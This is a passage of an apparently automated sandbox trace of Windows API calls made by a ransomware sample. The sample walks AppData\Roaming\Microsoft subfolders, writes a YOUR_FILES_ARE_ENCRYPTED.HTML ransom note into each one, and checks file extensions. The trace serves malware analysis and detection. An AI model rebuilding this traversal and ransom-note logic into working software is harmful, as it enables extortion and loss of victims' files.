ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.052] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.052] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.052] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.052] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0171.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.053] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.055] CloseHandle (hObject=0x5fc) returned 1 [0171.056] GetProcessHeap () returned 0x270000 [0171.057] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.057] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Crypto", cAlternateFileName="")) returned 1 [0171.057] wnsprintfW (in: pszDest=0x76a0010, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto") returned 53 [0171.057] GetProcessHeap () returned 0x270000 [0171.057] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.057] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto" [0171.057] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0171.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.058] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.058] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: 
lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 1 [0171.058] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned 57 [0171.058] GetProcessHeap () returned 0x270000 [0171.058] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0171.058] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0171.058] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0171.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0171.058] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: 
lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.059] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.059] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0171.059] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0171.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0171.059] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0171.062] CloseHandle (hObject=0x58c) returned 1 [0171.062] GetProcessHeap () returned 0x270000 [0171.063] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0171.063] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 0 [0171.063] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.063] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0171.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.064] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.068] CloseHandle (hObject=0x5fc) returned 1 [0171.068] GetProcessHeap () returned 0x270000 [0171.069] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.069] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa086aac, 
ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0171.069] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 64 [0171.069] GetProcessHeap () returned 0x270000 [0171.069] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.069] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0171.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0171.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa086aac, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.071] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa086aac, 
ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa086aac, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.071] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0171.071] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 77 [0171.071] GetProcessHeap () returned 0x270000 [0171.071] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0171.071] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0171.071] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0171.071] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0171.079] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.079] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd36f7c8c, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd376a0ad, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x92, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.079] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0171.079] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.079] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.079] lstrlenW 
(lpString=".ini") returned 4 [0171.079] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.079] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd36d1b2c, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd36d1b2c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x60, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0171.079] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0171.079] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.079] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0171.079] lstrlenW (lpString=".lnk") returned 4 [0171.079] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0171.079] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0171.079] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 89 [0171.079] GetProcessHeap () returned 0x270000 [0171.079] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 
Size=0x10000) returned 0x75aa008 [0171.082] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0171.082] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0171.082] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0171.083] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.083] FindNextFileW (in: hFindFile=0x42f3280, 
lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0171.083] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 110 [0171.083] GetProcessHeap () returned 0x270000 [0171.083] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75ba010 [0171.084] lstrcpyW (in: lpString1=0x75ba010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0171.084] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0171.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x4ebcc18 | out: 
lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0171.084] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.085] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.085] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0171.085] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0171.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
